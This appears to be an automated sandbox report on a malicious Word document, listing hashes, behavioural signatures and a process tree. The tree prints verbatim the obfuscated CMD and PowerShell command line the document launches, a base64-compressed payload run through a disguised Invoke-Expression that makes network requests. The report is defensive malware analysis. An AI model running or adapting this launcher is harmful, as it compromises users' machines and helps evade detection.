Analysis
-
max time kernel
143s -
max time network
164s -
platform
windows10-2004_x64 -
resource
win10v2004-20220721-en -
resource tags
arch:x64arch:x86image:win10v2004-20220721-enlocale:en-usos:windows10-2004-x64system -
submitted
24-07-2022 21:48
Behavioral task
behavioral1
Sample
76ddd79d0ee84395b6feb5a11b97af610346b95ccd8f4b9a1a2ffd46d3f0e24c.doc
Resource
win7-20220718-en
Behavioral task
behavioral2
Sample
76ddd79d0ee84395b6feb5a11b97af610346b95ccd8f4b9a1a2ffd46d3f0e24c.doc
Resource
win10v2004-20220721-en
General
-
Target
76ddd79d0ee84395b6feb5a11b97af610346b95ccd8f4b9a1a2ffd46d3f0e24c.doc
-
Size
78KB
-
MD5
1f9ff6ff0a0a7398da1cb639107c5f70
-
SHA1
ee7c0c29ae72eee830a18daa7ee1dfc85b354f40
-
SHA256
76ddd79d0ee84395b6feb5a11b97af610346b95ccd8f4b9a1a2ffd46d3f0e24c
-
SHA512
0ec22628ef5f1ee362ca5b939a046e5c3281598344df3d7a9b0a69a7dbda1e7c593fc3ea6945735d21408b4c84a96a5577dabf9a0a08d90ee8b2d010ad51c04f
Malware Config
Signatures
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE is not expected to spawn this process 1136 4928 CMD.exe 80 -
Blocklisted process makes network request 6 IoCs
flow pid Process 13 4460 powershell.exe 21 4460 powershell.exe 23 4460 powershell.exe 31 4460 powershell.exe 39 4460 powershell.exe 46 4460 powershell.exe -
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 2 IoCs
pid Process 4928 WINWORD.EXE 4928 WINWORD.EXE -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 4460 powershell.exe 4460 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 4460 powershell.exe -
Suspicious use of SetWindowsHookEx 7 IoCs
pid Process 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE 4928 WINWORD.EXE -
Suspicious use of WriteProcessMemory 4 IoCs
description pid Process procid_target PID 4928 wrote to memory of 1136 4928 WINWORD.EXE 81 PID 4928 wrote to memory of 1136 4928 WINWORD.EXE 81 PID 1136 wrote to memory of 4460 1136 CMD.exe 83 PID 1136 wrote to memory of 4460 1136 CMD.exe 83
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\76ddd79d0ee84395b6feb5a11b97af610346b95ccd8f4b9a1a2ffd46d3f0e24c.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:4928 -
C:\Windows\SYSTEM32\CMD.exeCMD C:\WinDOWS\SYStEm32\CmD.EXe /C "SEt LRg= ( new-oBjeCt IO.sTreAmreadeR(( new-oBjeCt io.CompressIoN.dEFLaTesTrEAM( [iO.MEmOrysTreAM][SYSTEM.cOnvERt]::fromBaSE64STRiNg('TZDRSsMwFIZfpReBrMylil7oQmGsQ9jUwqagiDdpdtrUZklJz9bWsne3LSrenu+c7+f85P1lGxqoZzb5BIleDMheIYl0DgY5iaqHkCrEch4EdV2z6rgXRoEumXVZcPv0iGWz+OEpOIEWbSa+mLSHYBv9EtkKY8QBnDy6dmTR8u9MVAqFyURqHdN5CkF8ebdZxot/qUJDmlhbVGgdVKNANQVlz6XOcUIX1OfkrYq80KM3V9eUk912ExIwpznCoZzSDzod+JQyaIDyPgmEVBOSr5SXG2/40u/QtR3p22ArWxttxf4+1zDuXHiD0Odrc7IFzNa9dJzwpPcU/CwFStWdz98=' ) , [sYStEm.io.COMPreSSion.coMpRESSioNMoDE]::dECOMPrESs) ), [SySTem.text.EnCoding]::AsCii) ).REaDtoEND() ^|. ( $sHElLiD[1]+$SHeLlid[13]+'X')&& POwErSHEll ( ^&(\"{1}{0}\" -f'et-ITEm','G' ) ( \"{0}{1}\" -f 'EnV:L','RG' ) ).\"Va`LUE\" ^|. ( ${PS`HOME}[4]+${p`shoME}[34] +'x' )"2⤵
- Process spawned unexpected child process
- Suspicious use of WriteProcessMemory
PID:1136 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exePOwErSHEll ( &(\"{1}{0}\" -f'et-ITEm','G' ) ( \"{0}{1}\" -f 'EnV:L','RG' ) ).\"Va`LUE\" |. ( ${PS`HOME}[4]+${p`shoME}[34] +'x' )3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4460
-
-